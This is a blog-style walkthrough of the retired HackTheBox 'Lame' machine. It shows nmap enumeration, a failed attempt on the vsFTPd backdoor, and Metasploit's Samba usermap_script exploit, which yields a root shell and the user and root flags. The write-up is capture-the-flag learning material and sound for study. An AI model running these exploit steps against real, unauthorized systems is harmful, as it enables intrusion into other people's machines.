Info

Lame is first box ever created on HackTheBox. It’s Linux-based easy machine created by ch4p.

Enumeration

Since this machine is retired, and only VIP members can access it, I have different machine IP. You can find Machine IP in that machine’s page. For this machine, you need basic Linux knowledge. As always, I first start with network scanning to see which ports are open, service versions etc..

nmap -sC -sV 10.10.10.3
Explanation for Parameters
Scanning Result

Exploitation

In scan result, we can see FTP details, and anonymous login is allowed. Also, there is also mentioned FTP Version “vsFTPd 2.3.4”. Googling it, I have found – VSFTPD v2.3.4 Backdoor Command Execution, tried to run it but nothing. It might be a rabbit hole. After attempting to enter using the vsFTPd attack vector, Samba becomes the only target. Googling it for exploit, I clicked on first result – Samba “username map script” Command Execution – Rapid7, and it’s exploitable with Metasploit. Also, the exploit version matches with our. So, I’ll run Metasploit console and try this one.

msfconsole

And now, I’ll use search command to find that exploit.

Search Command in Metasploit Console

Found it! Let’s use it as exploit:

use exploit/multi/samba/usermap_script

Now, when we have loaded our exploit, let’s take a look on exploit options with command:

show options
Options for Exploit

Okay, we have options! Now, let’s set it properly. We have RHOSTS, and there we need to set Machine IP. RPORT we shouldn’t change, it’s set by default on 139. LHOST is our Local Machine IP, actually our VPN Connection IP. You can check it by typing:

ifconfig
Local Machine IP

Your Local Machine IP (on HackTheBox) should start with 10.10.XX.XX. Now, we can set our LHOST in Metasploit Console to the Local Machine IP:

set LHOST 10.10.XX.XX

Now, let’s set RHOST (Machine IP):

set RHOST 10.129.159.5
Exploit Options

And now, let’s try to run it and see what will happen. Use command:

run

Wait few seconds, and…

Shell Session

And we got it! Now, we can grab our flags and submit it. On HTB Linux Machines, user flag is always in User Directory. (/home/username/user.txt) and root flag is always in Root Directory (/root/root.txt). To get user, get into the /home directory and you can see 4 users there. I have checked all of them, and only user makis have user.txt file. To get root, simply read the file under /root/root.txt.

User & Root

PWNED!

Thank you for reading this writeup. If you want to support my work:

Hack The Box Buy Me A Coffee GitHub Discord